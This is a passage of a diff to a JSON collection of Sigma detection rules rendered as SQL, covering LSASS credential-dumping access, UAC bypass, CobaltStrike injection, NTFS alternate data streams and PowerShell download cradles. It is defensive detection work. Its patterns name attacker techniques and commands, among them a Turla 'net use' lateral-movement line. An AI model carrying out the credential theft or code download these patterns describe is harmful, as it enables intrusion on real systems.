'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sourgrum.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Exploiting SetupComplete.cmd CVE-2019-1378", - "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects the creation of an ADS (Alternate Data Stream) that contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "status": "experimental", - "description": "Detects suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218.009" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\app-%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Yammer.exe' ESCAPE '\\' AND GrantedAccess = '0x1000') OR (Provider_Name = 'Microsoft-Windows-Kernel-Audit-API-Calls') OR (TargetImage LIKE '%\\\\Evernote\\\\Evernote.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "proc_access_win_direct_syscall_ntopenprocess.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", - "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "title": "UAC Bypass Using WOW64 Logger DLL Hijack", + "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" - ], - "filename": "proc_creation_win_pua_nimgrab.yml" - }, - { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Scripts or tools that download files" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "proc_access_win_uac_bypass_wow64_logger.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", + "title": "CobaltStrike BOF Injection Pattern", + "id": "09706624-b7f6-455d-9d02-adee024cee1d", "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "Load Undocumented Autoelevated COM Interface", + "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\'" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", - "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "title": "Rare GrantedAccess Flags on LSASS Access", + "id": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software accessing LSASS process for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess LIKE '%10' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR ((SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\')) OR (SourceCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\wermgr.exe -upload' ESCAPE '\\') OR (SourceImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\')) OR (SourceImage LIKE '%\\\\xampp-control.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x10'))))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "proc_access_win_rare_proc_access_lsass.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "title": "Credential Dumping by Pypykatz", + "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "description": "Detects LSASS process access by pypykatz for credential dumping.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "title": "LSASS Memory Access by Tool Named Dump", + "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Rare programs that contain the word dump in their name and access lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_lsass_memdump_indicators.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", + "title": "Potential NT API Stub Patching", + "id": "b916cba1-b38a-42da-9223-17114d846fd6", "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential NT API stub patching as seen used by the project PatchingAPI", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 